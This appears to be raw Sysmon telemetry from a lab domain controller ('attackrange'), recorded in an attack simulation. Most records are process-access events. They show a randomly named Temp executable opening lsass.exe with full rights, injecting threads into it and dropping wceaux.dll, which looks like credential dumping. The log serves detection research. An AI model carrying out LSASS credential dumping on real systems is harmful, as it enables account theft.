15:52:58.715{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005185Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.715{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005184Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.715{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005183Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.715{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005182Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.715{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005181Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.699{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005180Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.699{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005179Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.699{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005178Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.699{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005177Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.699{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005176Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.699{D28789B6-7C62-5FA1-0A00-000000008801}852912C:\Windows\system32\services.exe{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+12bee|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005175Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.714{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" serviceC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 824800x80000000000000005174Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.699{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\System32\lsass.exe31600x00000161B50D082C-- 10341000x80000000000000005173Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.699{D28789B6-7CDA-5FA1-0D01-000000008801}42523740C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 824800x80000000000000005172Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.684{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\System32\lsass.exe13480x00000161B50D082C-- 10341000x80000000000000005171Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.684{D28789B6-7CDA-5FA1-0D01-000000008801}42523740C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 824800x80000000000000005170Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.668{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\System32\lsass.exe48040x00000161B50D082C-- 10341000x80000000000000005169Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.668{D28789B6-7CDA-5FA1-0D01-000000008801}42523740C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 824800x80000000000000005168Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.637{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\System32\lsass.exe27640x00000161B50D082C-- 10341000x80000000000000005167Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.637{D28789B6-7CDA-5FA1-0D01-000000008801}42523740C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005166Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.621{D28789B6-7C73-5FA1-2F00-000000008801}21523460C:\Windows\sysmon64.exe{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14a9d|C:\Windows\sysmon64.exe+158a0|C:\Windows\sysmon64.exe+1623b|C:\Windows\sysmon64.exe+16528|C:\Windows\sysmon64.exe+167fe|C:\Windows\sysmon64.exe+18ad2|C:\Windows\sysmon64.exe+112a4|C:\Windows\sysmon64.exe+ab871|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 824800x80000000000000005165Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.621{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\System32\lsass.exe45400x00000161B50D082C-- 10341000x80000000000000005164Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.621{D28789B6-7CDA-5FA1-0D01-000000008801}42523740C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005163Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.621{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005162Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.621{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005161Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.621{D28789B6-7CDA-5FA1-0D01-000000008801}42523740C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+25cc|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005160Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:58.621{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exeC:\Windows\Temp\wceaux.dll2020-11-03 15:52:58.621 10341000x80000000000000005159Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.621{D28789B6-7C62-5FA1-0A00-000000008801}852912C:\Windows\system32\services.exe{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005158Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.621{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005157Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 